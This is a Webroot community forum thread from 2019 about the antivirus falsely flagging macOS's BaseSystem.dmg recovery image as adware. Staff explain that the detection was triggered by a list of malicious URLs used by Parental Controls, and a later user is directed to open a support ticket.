False positive is back again: BaseSystem.dmg

  • 27 June 2019
  • 8 replies

Badge +3
Once again, BaseSystem.dmg, which is part of the recovery partition installer for MacOS 10.11.6 is yet again being reported as a threat.

Our MSP only offers Webroot as an AV solution, and although I wish it weren't the case, it really appears that Mac support in webroot is: "Well... if we HAVE to" level of support.

I've been through the Adobe Creative Cloud crippling false positives of a year ago where if you didn't hit the right button, your CC install would be trashed. I've been through the total lack of interest in fixing the "Secure keyboard entry" conflicts with Adobe apps. I've been through the horrendously slow drive scans compared to other products. The high CPU usage... the firing off of multiple simultaneous scans... the CPU fans going nuts... The persistant Exclamation mark in the menu bar because it is going to find something wrong that isn't. Its so bad I've given up asking users to report it to me.

I am normally a very civil and calm person, but this is really getting under my skin. Will webroot ever give a crap about the Mac product?

8 replies

Userlevel 7
@Annoyed User Welcome to the Webroot Community Forum. ☺️

I am normally a very civil and calm person, but this is really getting under my skin. Will webroot ever give a crap about the Mac product?

The answer to your question I believe is what you see is what you get with WSA on a Mac computer sorry to say. I'm waiting for the new surprises with WSA when Apple releases macOS Catalina 10.15.

Please see THIS POST that I posted a few days ago.

Userlevel 7
Badge +26
This has been reported to our threat team and we will get back shortly.

Userlevel 7
Badge +22
@Annoyed User

This is an older FP that occasionally pops up here and there in a couple of circumstances. It's possible that an older definitions file is still being used by the agent on this system, or it had an older definitions file upon it's first start up after a long period of not being started up. If a scan is performed in this state, older false positives can be detected and reported to the console.

Another possibility is that this infection was detected with the original false positive date and has continued to report to the console that the machine is infected, even after a definitions file has been updated. This could be a bug that we would want to investigate through support channels.

If this is the case, the agent on the physical machine would actually show a green, "Protected" status, while the only the console shows the infection history.

I don't have many details from your post. Could you try to confirm whether the agent reports a green status? Also could you reply and let me know if this false positive alert was noticed from within your console.

We do not have any other volume on support regarding this false positive detection. Feel free to PM me your email details and I would be glad to look at your account information.


Badge +3
It just completed a full scan (10 Hours for one SSD drive!) and it is still showing as detected as PUA.OSX.Adware.BucaApps.1.r. The console is not showing green, it still shows "Threats Detected"

VirusTotal shows the 470MB disk image to be clean.

I'll PM you with info.
Userlevel 7
Badge +22
Late follow up on this post.

There was a file contained within this DMG that is a list of plain text malicious URLs that OS X used in a previous version (10.11) Parental Controls. This file is not included in current releases that I have found so I believe that they have changed the method in which they store these URLs or provide an entirely different mechanism.

Annoyed User opted to allow the file manually so that we could continue to protect against any malicious file that embed the URL in question within a payload file.
Badge +1
I have had this threat on my control panel for some time, and whilst I was aware it wasn't anything serious, it is becoming quite annoying, and I would like to remove it.

I am still running MacOS Sierra.

Basesystem.dmg - PUA.OSX.Adware.BucaApps.1.r

Any idea how I actually go about this without wrecking anything?
Userlevel 7
Hello @shaneb, Welcome to the Webroot Community Forum.

I would have the Professionals at Webroot Support do this. Please submit a Support Ticket or Contact Webroot Support to sort this problem. This service is FREE with a Paid Subscription.
Support Ticket System is Open 24/7

Note: When submitting a Support Ticket, Please wait for a response from Support. Putting in another Support Ticket on this problem before Support responses will put your first Support Ticket at the end of the queue.

Badge +1
Thanks Dave, I will do that! 🙂